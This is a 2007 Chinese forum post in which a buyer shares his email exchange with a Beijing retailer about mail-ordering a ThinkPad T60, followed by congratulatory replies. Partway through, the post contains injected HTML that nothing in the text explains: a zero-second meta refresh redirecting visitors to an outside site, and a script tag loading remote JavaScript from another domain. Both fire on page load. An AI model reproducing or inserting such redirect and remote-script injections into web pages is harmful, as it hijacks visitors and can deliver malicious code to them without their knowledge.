开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 我的购机日记---借鉴了“meiqq”的<<懒人邮购>>

借鉴了“meiqq”的《懒人邮购T60-E79流水帐,希望对准备邮购的TX有帮助,呵呵》一文,我也是通过E_MAIL联系EddieFan完成购机!希望对大家有帮助!

"double" Mail to "EddieFan"  发送时间: 2007年4月18日 17:16
     你好,同事想买台笔记本,我推荐到贵处买,同事委托我办理,准备全款套餐价
邮购如下机器,请mail给我最新的优惠报价,谢谢!  
     T60 D62  一台
     其它要求如下:
  1、能保屏幕无亮点、暗点么?
  2、中文WINDOWS XP PROFESSIONAL系统(预装成可以一键恢复的,再帮我把硬盘分为两个区,C盘20G左
右即可)
  3、IBM原装内胆包。
  4、翔意的隐藏分区恢复盘一套(中文)  
  5、翔意数码Ver2.0版本DVD系统恢复盘内含多于30种的常用软件(1DVD)
  6、DVD中文专业版隐藏分区恢复盘(1DVD+1CD)
  7、翔意数码VIP贵宾服务(悟空城身份象征)
  8、翔意24工时关爱快修售后服务(包括硬件,软件)

"EddieFan" Mail to "double" 发送时间:Wed, 18 Apr 2007 23:38:00 +0800
    我们一切以网站价格为准,全套价格目前是12000元
  1:保无任何点
  2:可以
  3:B套餐或者单买60
  4:送
  5:送
  6:同4
  7:送
  8此价格已经包含快修
  如有问题可以给我回信或者电话咨询65523369

"double" Mail to "EddieFan" 发送时间: 2007年4月19日 9:25
补充事项:
    a、第3条IBM原装内胆包。选择B套餐。
    b、再增加一个IBM原装鼠标。
    如果我全款邮寄的话应该汇款:12000+80(鼠标)=12080元对么?
    c、请提供您的交行的帐号信息。(是不是用交行省汇费阿?呵呵!)
    d、我在大连,邮寄需要几天? 是快递么?

"EddieFan" Mail to "double"  发送时间:Thu, 19 Apr 2007 16:45:01 +0800
A:好的
B:没错
C:浦发银行免费,交行25,其他银行50,交行:************,浦
发:****************,户名都是樊非非
D:2天内,通过EMS

"double" Mail to "EddieFan"  发送时间: 2007年4月23日 8:54
    你好:
    我昨日(22日)已将12080元汇入你提供的浦发帐户中,流水号是:***********请注意查收。
    附上我的邮寄地址:******************************
    另:发货时能否将港票一并邮寄过来。

"EddieFan" Mail to "double"  发送时间: Mon, 23 Apr 2007 11:33:36 +0800
机器已经发走,港票需要您拿到机器后按论坛要求申请才可
有什么问题可以发邮件给我 .
"double" Mail to "EddieFan" 发送时间: 2007年4月25日 14:02
能否将EMS邮件号告诉我,T60 D62 据说是4月23日发的货,急死我了 !!!!现在只能在办公室侯着了
,那里也不能去!
"EddieFan" Mail to "double" 发送时间: Wed, 25 Apr 2007 14:13:32 +0800
http://www.xynbnb.com/viewthread.php?tid=36290&extra=page%3D1

25日收到机器!!!!

+200---EddieFan
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

EddieFan + 200

恭喜楼主,期待图片
有意思,第一次看这样写心得的

哈哈
把和俺得通信都贴上了

回复 #1 double 的帖子

哈哈,恭喜LZ先。
我的帖子以后就是邮购的模板了,各位TX要邮购的,直接copy好了,EddieFan的态度不错,呵呵(有点广告的嫌疑,^_^)
明天谈好了,就一样邮购。
这个也算是日记吧   .
楼主的帖子很有借鉴意义!!!谢谢!
很不错啊!
恭喜楼住了
有意思,第一次看这样写心得的
周日就去入手一台T60